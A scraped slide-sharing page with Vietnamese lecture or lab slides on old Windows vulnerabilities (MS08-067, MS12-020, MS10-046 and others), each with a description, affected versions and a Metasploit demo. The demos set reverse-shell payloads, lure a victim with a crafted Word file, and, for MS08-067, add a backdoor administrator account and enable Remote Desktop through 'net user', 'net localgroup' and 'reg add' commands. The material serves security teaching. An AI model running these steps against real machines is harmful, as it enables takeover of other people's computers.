Tổng quan tong-quan_anninhmangTổng quan tong-quan_anninhmang
Tổng quan tong-quan_anninhmang
 
Know Your Worm (Conficker)
Know Your Worm (Conficker)Know Your Worm (Conficker)
Know Your Worm (Conficker)
 
Conficker
ConfickerConficker
Conficker
 
SBC 2012 - SSL/TLS Attacks & Defenses (Lê Quốc Nhật Đông)
SBC 2012 - SSL/TLS Attacks & Defenses (Lê Quốc Nhật Đông)SBC 2012 - SSL/TLS Attacks & Defenses (Lê Quốc Nhật Đông)
SBC 2012 - SSL/TLS Attacks & Defenses (Lê Quốc Nhật Đông)
 
Bài giảng bảo mật hệ thống thông tin
Bài giảng bảo mật hệ thống thông tinBài giảng bảo mật hệ thống thông tin
Bài giảng bảo mật hệ thống thông tin
 
Ma hoa voi khoa
Ma hoa voi khoaMa hoa voi khoa
Ma hoa voi khoa
 
Virus
VirusVirus
Virus
 
Slide môn Đảm bảo an toàn thông tin
Slide môn Đảm bảo an toàn thông tinSlide môn Đảm bảo an toàn thông tin
Slide môn Đảm bảo an toàn thông tin
 
FPT Univ. Talkshow IT khong chi la lap trinh
FPT Univ. Talkshow IT khong chi la lap trinhFPT Univ. Talkshow IT khong chi la lap trinh
FPT Univ. Talkshow IT khong chi la lap trinh
 
SBC 2012 - Tổng quan về bảo mật trong Cloud (Lê Vĩnh Đạt)
SBC 2012 - Tổng quan về bảo mật trong Cloud (Lê Vĩnh Đạt)SBC 2012 - Tổng quan về bảo mật trong Cloud (Lê Vĩnh Đạt)
SBC 2012 - Tổng quan về bảo mật trong Cloud (Lê Vĩnh Đạt)
 
Professional programme on Financial modelling using Microsoft Excel
Professional programme on Financial modelling using Microsoft ExcelProfessional programme on Financial modelling using Microsoft Excel
Professional programme on Financial modelling using Microsoft Excel
 
MỘT SỐ NGUY CƠ ĐỐI VỚI AN TOÀN, BẢO MẬT THÔNG TIN TRÊN MẠNG CNTT CƠ QUAN ĐẢNG...
MỘT SỐ NGUY CƠ ĐỐI VỚI AN TOÀN, BẢO MẬT THÔNG TIN TRÊN MẠNG CNTT CƠ QUAN ĐẢNG...MỘT SỐ NGUY CƠ ĐỐI VỚI AN TOÀN, BẢO MẬT THÔNG TIN TRÊN MẠNG CNTT CƠ QUAN ĐẢNG...
MỘT SỐ NGUY CƠ ĐỐI VỚI AN TOÀN, BẢO MẬT THÔNG TIN TRÊN MẠNG CNTT CƠ QUAN ĐẢNG...
 
Advanced Financial Modeling Using Excel 2013
Advanced Financial Modeling Using Excel 2013Advanced Financial Modeling Using Excel 2013
Advanced Financial Modeling Using Excel 2013
 
Báo cáo thực tập hàng tuần - Các chuẩn bảo mật web (OWASP)
Báo cáo thực tập hàng tuần - Các chuẩn bảo mật web (OWASP)Báo cáo thực tập hàng tuần - Các chuẩn bảo mật web (OWASP)
Báo cáo thực tập hàng tuần - Các chuẩn bảo mật web (OWASP)
 
Basic & Advanced Scrum Framework
Basic & Advanced Scrum FrameworkBasic & Advanced Scrum Framework
Basic & Advanced Scrum Framework
 
Bài 13. BẢO MẬT THÔNG TIN TRONG CÁC HỆ CSDL
Bài 13. BẢO MẬT THÔNG TIN TRONG CÁC HỆ CSDLBài 13. BẢO MẬT THÔNG TIN TRONG CÁC HỆ CSDL
Bài 13. BẢO MẬT THÔNG TIN TRONG CÁC HỆ CSDL
 
Giáo trình mật mã học công nghệ thông tin
Giáo trình mật mã học công nghệ thông tinGiáo trình mật mã học công nghệ thông tin
Giáo trình mật mã học công nghệ thông tin
 
John Charnes - Financial Modeling with Crystal Ball and Excel - 2007.pdf
John Charnes - Financial Modeling with Crystal Ball and Excel - 2007.pdfJohn Charnes - Financial Modeling with Crystal Ball and Excel - 2007.pdf
John Charnes - Financial Modeling with Crystal Ball and Excel - 2007.pdf
 
Bai giang-an-toan-va-bao-mat-he-thong-thong-tin-lxt
Bai giang-an-toan-va-bao-mat-he-thong-thong-tin-lxtBai giang-an-toan-va-bao-mat-he-thong-thong-tin-lxt
Bai giang-an-toan-va-bao-mat-he-thong-thong-tin-lxt
 
Các mô hình hồi qui 2
Các mô hình hồi qui 2Các mô hình hồi qui 2
Các mô hình hồi qui 2
 

Similar to Loi baomat windows(f)

Bao cao thuc tap tuan 1 Athena Tran Dang Khoa
Bao cao thuc tap tuan 1 Athena Tran Dang KhoaBao cao thuc tap tuan 1 Athena Tran Dang Khoa
Bao cao thuc tap tuan 1 Athena Tran Dang Khoa
Âu Dương Bình
 
Báo cáo system hacking
Báo cáo system hackingBáo cáo system hacking
Báo cáo system hacking
Huynh Khang
 
Slide báo cáo: System Hacking
Slide báo cáo: System HackingSlide báo cáo: System Hacking
Slide báo cáo: System Hacking
Huynh Khang
 
Tuan5
Tuan5Tuan5
Report athena week 1
Report athena week 1Report athena week 1
Report athena week 1
Liên Hán
 
Slide metaploit
Slide metaploitSlide metaploit
Slide metaploit
chungdv
 
Report athena week 1
Report athena week 1Report athena week 1
Report athena week 1
Liên Hán
 
Tailieu.vncty.com bao cao mang may tinh va internet
Tailieu.vncty.com   bao cao mang may tinh va internetTailieu.vncty.com   bao cao mang may tinh va internet
Tailieu.vncty.com bao cao mang may tinh va internet
Trần Đức Anh
 
Report athena week 1
Report athena week 1Report athena week 1
Report athena week 1
Liên Hán
 
TỰ HỌC LPI 2
TỰ HỌC LPI 2TỰ HỌC LPI 2
TỰ HỌC LPI 2
Hoàng Đạt
 
INT1484-Bai-thuc-hanh-01.pdf
INT1484-Bai-thuc-hanh-01.pdfINT1484-Bai-thuc-hanh-01.pdf
INT1484-Bai-thuc-hanh-01.pdf
PhamTruongGiang4
 
cài đặt metasploit
cài đặt metasploitcài đặt metasploit
cài đặt metasploit
Lê Lãnh
 
Bao cao thuc tap tuan 2
Bao cao thuc tap tuan 2Bao cao thuc tap tuan 2
Bao cao thuc tap tuan 2
Âu Dương Bình
 
Bai bao cao 3
Bai bao cao 3Bai bao cao 3
Bai bao cao 3
tuankiet123
 
Lab 16 terminal services
Lab 16 terminal services  Lab 16 terminal services
Lab 16 terminal services Pham Viet Dung
 
Bao cao vps
Bao cao vpsBao cao vps
Bao cao vps
Chuc Thanh
 
Vũ thanh hiếu tạo mã độc trên vps tấn công android
Vũ thanh hiếu   tạo mã độc trên vps tấn công androidVũ thanh hiếu   tạo mã độc trên vps tấn công android
Vũ thanh hiếu tạo mã độc trên vps tấn công android
Anh Hiếu
 
Part 33 hacking - windows server update service - wsus -www.key4_vip.info
Part 33   hacking - windows server update service - wsus -www.key4_vip.infoPart 33   hacking - windows server update service - wsus -www.key4_vip.info
Part 33 hacking - windows server update service - wsus -www.key4_vip.infolaonap166
 

Similar to Loi baomat windows(f) (20)

Bao cao thuc tap tuan 1 Athena Tran Dang Khoa
Bao cao thuc tap tuan 1 Athena Tran Dang KhoaBao cao thuc tap tuan 1 Athena Tran Dang Khoa
Bao cao thuc tap tuan 1 Athena Tran Dang Khoa
 
Bao cao
Bao caoBao cao
Bao cao
 
Báo cáo system hacking
Báo cáo system hackingBáo cáo system hacking
Báo cáo system hacking
 
Slide báo cáo: System Hacking
Slide báo cáo: System HackingSlide báo cáo: System Hacking
Slide báo cáo: System Hacking
 
Tuan5
Tuan5Tuan5
Tuan5
 
Report athena week 1
Report athena week 1Report athena week 1
Report athena week 1
 
Slide metaploit
Slide metaploitSlide metaploit
Slide metaploit
 
Report athena week 1
Report athena week 1Report athena week 1
Report athena week 1
 
Tailieu.vncty.com bao cao mang may tinh va internet
Tailieu.vncty.com   bao cao mang may tinh va internetTailieu.vncty.com   bao cao mang may tinh va internet
Tailieu.vncty.com bao cao mang may tinh va internet
 
Report athena week 1
Report athena week 1Report athena week 1
Report athena week 1
 
TỰ HỌC LPI 2
TỰ HỌC LPI 2TỰ HỌC LPI 2
TỰ HỌC LPI 2
 
INT1484-Bai-thuc-hanh-01.pdf
INT1484-Bai-thuc-hanh-01.pdfINT1484-Bai-thuc-hanh-01.pdf
INT1484-Bai-thuc-hanh-01.pdf
 
cài đặt metasploit
cài đặt metasploitcài đặt metasploit
cài đặt metasploit
 
Bao cao thuc tap tuan 2
Bao cao thuc tap tuan 2Bao cao thuc tap tuan 2
Bao cao thuc tap tuan 2
 
Bai bao cao 3
Bai bao cao 3Bai bao cao 3
Bai bao cao 3
 
Lab 16 terminal services
Lab 16 terminal services  Lab 16 terminal services
Lab 16 terminal services
 
Bao cao vps
Bao cao vpsBao cao vps
Bao cao vps
 
Vũ thanh hiếu tạo mã độc trên vps tấn công android
Vũ thanh hiếu   tạo mã độc trên vps tấn công androidVũ thanh hiếu   tạo mã độc trên vps tấn công android
Vũ thanh hiếu tạo mã độc trên vps tấn công android
 
Part 33 hacking - windows server update service - wsus -www.key4_vip.info
Part 33   hacking - windows server update service - wsus -www.key4_vip.infoPart 33   hacking - windows server update service - wsus -www.key4_vip.info
Part 33 hacking - windows server update service - wsus -www.key4_vip.info
 
Bao caocuoiki
Bao caocuoikiBao caocuoiki
Bao caocuoiki
 

Loi baomat windows(f)

  • 1. LỖ HỎNG BẢO MẬT TRONG WINDOWS 1. Lỗ hổng MS13-071: a. Mô tả: Lỗ hổng có thể cho phép thực thi mã từ xa nếu người dùng áp dụng một chủ đề Windows thủ công trên hệ thống của họ. Trong mọi trường hợp, người dùng không thể bị buộc phải mở tập tin hoặc áp dụng các chủ đề, đối với một cuộc tấn công thành công, người dùng phải được thuyết phục để làm như vậy. b. Phần mềm bị ảnh hưởng: Windows XP Windows Vista Windows Server 2003 Windows Server 2008 c. Demo: Sử dụng mã lỗi ms13-071
  • 2. Set payload reverse_tcp Set các giá trị option Tiến hành exploit
  • 3. Bắt được session của victim
  • 4. 2. Lỗ hổng MS13-080: a. Mô tả: Các lỗ hổng nghiêm trọng nhất có thể cho phép thực thi mã từ xa nếu người dùng xem một trang web thiết kế đặc biệt sử dụng Internet Explorer . Một kẻ tấn công khai thác thành công nghiêm trọng nhất của các lỗ hổng có thể lấy được quyền sử dụng giống như người dùng hiện hành . Người dùng có tài khoản được cấu hình để có quyền sử dụng ít hơn trên hệ thống có thể được ít ảnh hưởng hơn so với những người dùng hoạt động với người sử dụng quyền hành chính. b. Phần mềm bị ảnh hưởng: Internet Explorer 6, 7, 8, 9, 10, 11 c. Demo: Sử dụng mã lỗi ms13-080
  • 6. Set srvhost và ruipath Tiến hành Exploit
  • 7. Bắt được session của victim
  • 8. 3. Lỗ hổng MS10-042: a. Mô tả: Lỗ hổng này có thể cho phép thực thi mã từ xa nếu người dùng xem một trang web thiết kế đặc biệt bằng cách sử dụng một trình duyệt web hoặc nhấp vào một liên kết thiết kế đặc biệt trong một thông báo e-mail. b. Phần mềm bị ảnh hưởng: Windows XP Service Pack 2 and Windows XP Service Pack 3 Windows XP Professional x64 Edition Service Pack 2 Windows Server 2003 Service Pack 2 Windows Server 2003 x64 Edition Service Pack 2 Windows Server 2003 with SP2 for Itanium-based Systems c. Demo: Sử dụng mã lỗi ms10-042
  • 9. Set payload reverse_tcp và set giá trị srvhost và lhost Tiến hành exploit Bắt được session của victim
  • 10. 4. Lỗ hổng MS12-027: a. Mô tả: Các lỗ hổng có thể cho phép thực thi mã từ xa nếu người dùng truy cập một trang web có chứa nội dung đặc biệt được thiết kế để khai thác lỗ hổng. Trong mọi trường hợp, tuy nhiên, kẻ tấn công sẽ không có cách nào để buộc người dùng truy cập một trang web như vậ. Thay vào đó, kẻ tấn công sẽ phải thuyết phục người dùng truy cập các trang web, thường bằng cách cho họ bấm vào một liên kết trong một email hoặc tin nhắn chỉ dẫn họ đến trang web của kẻ tấn công . Các tập tin độc hại có thể được gửi như một file đính kèm email, nhưng những kẻ tấn công sẽ phải thuyết phục người sử dụng mở file đính kèm để khai thác lỗ hổng. b. Phần mềm bị ảnh hưởng: Microsoft Office 2003, Microsoft Office 2007; Microsoft Office 2010 (except x64-based editions); Microsoft SQL Server 2000 Analysis Services, Microsoft SQL Server 2000 (except Itanium-based editions), Microsoft SQL Server 2005 (except Microsoft SQL Server 2005 Express Edition, but including Microsoft SQL Server 2005 Express Edition with Advanced Services), Microsoft SQL Server 2008, Microsoft SQL Server 2008 R2, Microsoft BizTalk Server 2002, Microsoft Commerce Server 2002, Microsoft Commerce Server 2007, Microsoft Commerce Server 2009, Microsoft Commerce Server 2009 R2, Microsoft Visual FoxPro 8.0, Microsoft Visual FoxPro 9.0, and Visual Basic 6.0 Runtime c. Demo: Sử dụng mã lỗi ms12-027
  • 11. Set payload và các giá trị option cần thiết Tiến hành exploit
  • 12. Di chuyển tập tin word vừa tạo ra desktop và gửi cho victim Tiến hành cấu hình handler để lắng nghe
  • 13. Set payload và option của handler Tiến hành run handler và kết quả khi victim chạy tập tin word, ta bắt được session của viction
  • 14. 5. Lỗ hổng MS09-050: a. Mô tả: Một lỗ hổng nghiêm trọng (Dos và Exec code) có thể cho phép thực thi mã từ xa nếu kẻ tấn công gửi một gói SMB thiết kế đặc biệt với một máy tính chạy các dịch vụ Server. b. Phần mềm bị ảnh hưởng: Windows Vista, Windows Vista Service Pack 1, and Windows Vista Service Pack 2 Windows Vista x64 Edition, Windows Vista x64 Edition Service Pack 1, and Windows Vista x64 Edition Service Pack 2 Windows Server 2008 for 32-bit Systems and Windows Server 2008 for 32-bit Systems Service Pack 2 Windows Server 2008 for x64-based Systems and Windows Server 2008 for x64-based Systems Service Pack 2 Windows Server 2008 for Itanium-based Systems and Windows Server 2008 for Itanium-based Systems Service Pack 2 c. Demo: Sử dụng mã lỗi ms09-050
  • 15. Set payload reverse_tcp và các option cần thiết Tiến hành exploit và bắt được session của victim
  • 16. 6. Lỗ hổng MS10-046: a. Mô tả: Một lỗ hổng được công bố công khai trong Windows Shell. Các lỗ hổng có thể cho phép thực thi mã từ xa nếu biểu tượng của một phím tắt thiết kế đặc biệt được hiển thị. Một kẻ tấn công khai thác thành công lỗ hổng này có thể đạt được các quyền người dùng tương tự như người dùng địa phương. Người dùng có tài khoản được cấu hình để có quyền sử dụng ít hơn trên hệ thống có thể được ít ảnh hưởng hơn so với những người dùng hoạt động với người sử dụng quyền hành chính. Lỗi nguy hiểm nằm trong các tập tin "shortcut" (định dạng *.Ink) của Windows, các tập tin này thường nằm ở giao diện desktop hay trình đơn Start. Bằng cách tạo ra một tập tin shortcut nhúng mã độc, tin tặc có thể tự động thực thi mã độc khi người dùng xem tập tin shortcut hay nội dung của một thư mục chứa tập tin shortcut nhúng mã độc. Bản vá lỗi có chứa đựng phiên bản mới của tập tin Shell32.dll, đây là phần cập nhật quan trọng. Shell32.dll là một tập tin thư viện rất quan trọng trong Windows, nó chứa đựng một số hàm Windows Shell API. Nếu Shell32.dll bị lỗi hay cập nhật lỗi, máy tính sẽ có tình trạng "Màn hình xanh chết chóc" (Blue Screen of Death - BSOD). b. Phần mềm bị ảnh hưởng: Windows XP Service Pack 3 Windows XP Professional x64 Edition Service Pack 2 Windows Server 2003 Service Pack 2 Windows Server 2003 x64 Edition Service Pack 2 Windows Server 2003 with SP2 for Itanium-based Systems Windows Vista Service Pack 1 and Windows Vista Service Pack 2 Windows Vista x64 Edition Service Pack 1 and Windows Vista x64 Edition Service Pack 2 Windows Server 2008 for 32-bit Systems and Windows Server 2008 for 32-bit Systems Service Pack 2 Windows Server 2008 for x64-based Systems and Windows Server 2008 for x64-based Systems Service Pack 2 Windows Server 2008 for Itanium-based Systems and Windows Server 2008 for Itanium-based Systems Service Pack 2 Windows 7 for 32-bit Systems Windows 7 for x64-based Systems Windows Server 2008 R2 for x64-based Systems
  • 17. Windows Server 2008 R2 for Itanium-based Systems c. Demo 1. 2.
  • 18. 3. 4.
  • 20. 8. 9.
  • 22. 7. Lỗ hổng MS12-020: a. Mô tả: Hai lỗ hổng bảo mật riêng tư trong Remote Desktop Protocol (Exec Code và DoS). Lỗ hổng có thể cho phép thực thi mã từ xa nếu một kẻ tấn công gửi một chuỗi các gói RDP thiết kế đặc biệt với một hệ thống bị ảnh hưởng. Theo mặc định, Remote Desktop Protocol (RDP) không được kích hoạt trên bất kỳ hệ điều hành Windows. Các hệ thống không đã kích hoạt RDP không có nguy cơ. b. Phần mềm bị ảnh hưởng: Windows XP Service Pack 3 Windows XP Professional x64 Edition Service Pack 2 Windows Server 2003 Service Pack 2 Windows Server 2003 x64 Edition Service Pack 2 Windows Server 2003 with SP2 for Itanium-based Systems Windows Vista Service Pack 2 Windows Vista x64 Edition Service Pack 2 Windows Server 2008 for 32-bit Systems Service Pack 2 Windows Server 2008 for x64-based Systems Service Pack 2 Windows Server 2008 for Itanium-based Systems Service Pack 2 Windows 7 for 32-bit Systems and Windows 7 for 32-bit Systems Service Pack 1 Windows 7 for x64-based Systems and Windows 7 for x64-based Systems Service Pack 1 Windows Server 2008 R2 for x64-based Systems and Windows Server 2008 R2 for x64-based Systems Service Pack 1 Windows Server 2008 R2 for Itanium-based Systems and Windows Server 2008 R2 for Itanium- based Systems Service Pack 1 c. Demo
  • 23. Sử dụng mã lỗi ms12-020 Set options Tiến hành run
  • 24. Máy của victim đã bị dump 8. Lỗ hổng MS11-080: a. Mô tả: Lỗ hổng có thể cho phép nâng quyền nếu một kẻ tấn công đăng nhập vào hệ thống của người sử dụng và chạy một ứng dụng thiết kế đặc biệt. Một kẻ tấn công phải có các thông tin đăng nhập hợp lệ và có thể đăng nhập cục bộ để khai thác lỗ hổng. b. Phần mềm bị ảnh hưởng: Windows XP Windows Server 2003 c. Demo Sử dụng mã lỗi ms13-080
  • 25. Set payload và các option cần thiết Tiến hành exploit Khi victim truy cập vào link thì chúng ta bắt được session của victim
  • 26. 9. Lỗ hổng MS12-004: a. Mô tả: Các lỗ hổng có thể cho phép thực thi mã từ xa nếu người dùng mở một tập tin phương tiện truyền thông thiết kế đặc biệt. Một kẻ tấn công khai thác thành công lỗ hổng có thể lấy được quyền sử dụng giống như người dùng địa phương. Người dùng có tài khoản được cấu hình để có quyền sử dụng ít hơn trên hệ thống có thể được ít ảnh hưởng hơn so với những người dùng hoạt động với người sử dụng quyền hành chính.. b. Phần mềm bị ảnh hưởng: Windows XP Windows Server 2003 Windows Vista Windows Server 2008 Windows 7 Windows Server 2008 R2 c. Demo 1. Use exploit/windows/browser/ms12_ 004_midi
  • 27. 2. Xem IP máy attacker: Ifconfig 3. set SRVHOST máy attacker
  • 29. 6. Tiến hành Exploit 7.
  • 30. 10. Lỗ hổng MS10-073: a. Mô tả: một số lỗ hổng bảo mật được tiết lộ công khai trong các trình điều khiển hạt nhân-mode Windows. Nghiêm trọng nhất trong số các lỗ hổng có thể cho phép nâng quyền nếu một kẻ tấn công đăng nhập vào một hệ thống bị ảnh hưởng và chạy một ứng dụng thiết kế đặc biệt. Một kẻ tấn công phải có các thông tin đăng nhập hợp lệ và có thể đăng nhập cục bộ để khai thác lỗ hổng này. Dễ bị tổn thương không thể bị khai thác từ xa hoặc bởi người dùng vô danh. b. Phần mềm bị ảnh hưởng: Windows XP Windows Server 2003 Windows Vista Windows Server 2008 Windows 7 Windows Server 2008 R2 c. Demo: 1.
  • 31. 2. 3.
  • 32. 4. 5.
  • 33. 11. Lỗ hổng MS10-061: a. Mô tả: Các lỗ hổng có thể cho phép thực thi mã từ xa nếu kẻ tấn công gửi một yêu cầu in thiết kế đặc biệt với một hệ thống dễ bị tổn thương có một giao diện spooler in tiếp xúc qua RPC . Theo mặc định , máy in không được chia sẻ trên bất kỳ hệ điều hành Windows hỗ trợ. b. Phần mềm bị ảnh hưởng: Windows XP Windows Server 2003 Windows Vista Windows Server 2008 Windows 7 Windows Server 2008 R2 c. Demo: 1.
  • 35. 12. Lỗ hổng MS10-046: a. Mô tả: một lỗ hổng được công bố công khai trong Windows Shell. Các lỗ hổng có thể cho phép thực thi mã từ xa nếu biểu tượng của một phím tắt thiết kế đặc biệt được hiển thị. Một kẻ tấn công khai thác thành công lỗ hổng này có thể đạt được các quyền người dùng tương tự như người dùng địa phương. Người dùng có tài khoản được cấu hình để có quyền sử dụng ít hơn trên hệ thống có thể được ít ảnh hưởng hơn so với những người dùng hoạt động với người sử dụng quyền hành chính. b. Phần mềm bị ảnh hưởng: Windows XP Windows Server 2003 Windows Vista Windows Server 2008 Windows 7 Windows Server 2008 R2 c. Demo: 1.
  • 36. 2. 3.
  • 37. 4. 5.
  • 38. 6. 7.
  • 39. 8. 9.
  • 42. 13. Lỗ hổng MS11-006: a. Mô tả: một lỗ hổng được công bố công khai trong bộ vi xử lý đồ họa Windows Shell. Các lỗ hổng có thể cho phép thực thi mã từ xa nếu người dùng xem một hình ảnh thu nhỏ thiết kế đặc biệt. Một kẻ tấn công khai thác thành công lỗ hổng này có thể lấy được quyền sử dụng giống như người dùng đăng nhập vào. Người dùng có tài khoản được cấu hình để có quyền sử dụng ít hơn trên hệ thống có thể được ít ảnh hưởng hơn so với những người dùng hoạt động với người sử dụng quyền hành chính. b. Phần mềm bị ảnh hưởng: Windows XP Windows Server 2003 Windows Vista Windows Server 2008 c. Demo: 1.
  • 45. 14. Lỗ hổng MS08-067: a. Mô tả: Các lỗ hổng có thể cho phép thực thi mã từ xa nếu một hệ thống bị ảnh hưởng nhận được yêu cầu RPC đặc biệt. Trên Microsoft Windows 2000, Windows XP, và 2003 hệ thống Windows Server, kẻ tấn công có thể khai thác lỗ hổng này mà không cần xác thực để chạy mã nhị phân. Có thể là lỗ hổng này có thể được sử dụng trong crafting của một wormable khai thác. Tường lửa thực hành tốt nhất và cấu hình tường lửa mặc định tiêu chuẩn có thể giúp bảo vệ tài nguyên mạng từ các cuộc tấn công có nguồn gốc bên ngoài chu vi doanh nghiệp. b. Phần mềm bị ảnh hưởng: Microsoft Windows 2000 Service Pack 4 Windows XP Service Pack 2 Windows XP Service Pack 3 Windows XP Professional x64 Edition Windows XP Professional x64 Edition Service Pack 2 Windows Server 2003 Service Pack 1 Windows Server 2003 Service Pack 2 Windows Server 2003 x64 Edition Windows Server 2003 x64 Edition Service Pack 2 Windows Server 2003 with SP1 for Itanium-based Systems Windows Server 2003 with SP2 for Itanium-based Systems Windows Vista and Windows Vista Service Pack 1 Windows Vista x64 Edition and Windows Vista x64 Edition Service Pack 1 Windows Server 2008 for 32-bit Systems Windows Server 2008 for x64-based Systems Windows Server 2008 for Itanium-based Systems c. Demo:
  • 46. 1. Khởi động chương trình msfgui  Chọn menu Exploits  windows  More…  smb  ms08_067_netapi 2. Phần Targets để Automatics Targeting
  • 47. 3. Về Payload chọn windows/shell_bind_tcp 4. RHOST: Điền IP của máy Victim 5. Click Run exploit
  • 48. 6. Nếu Exploit thành công sẽ có 1 session được tạo ra, double click vào session đó để vào cmd của máy Victim 7. Để kiểm tra xem đây có phải là cmd của máy Victim không. Ta dùng lệnh ipconfig 8. Tạo 1 user: luanvan, password: 123 với lệnh net user luanvan 123 /add
  • 49. 9. Add user vừa tạo vào group Administrators bằng lệnh net localgroup administrators luanvan /add 10.Remote desktop tới máy Victim thất bại vì máy Victim chưa bật Remote Desktop
  • 50. 11.Để bật chức năng remote Desktop của máy Victim ta dùng lệnh: reg add "HKEY_LOCAL_MACHINE SYSTEM CurrentControlSet Control Terminal Server" /v fDenyTSConnections /t REG_DWORD /d 0 /f 12.Hoàn toàn chiếm được quyền điều khiển máy Victim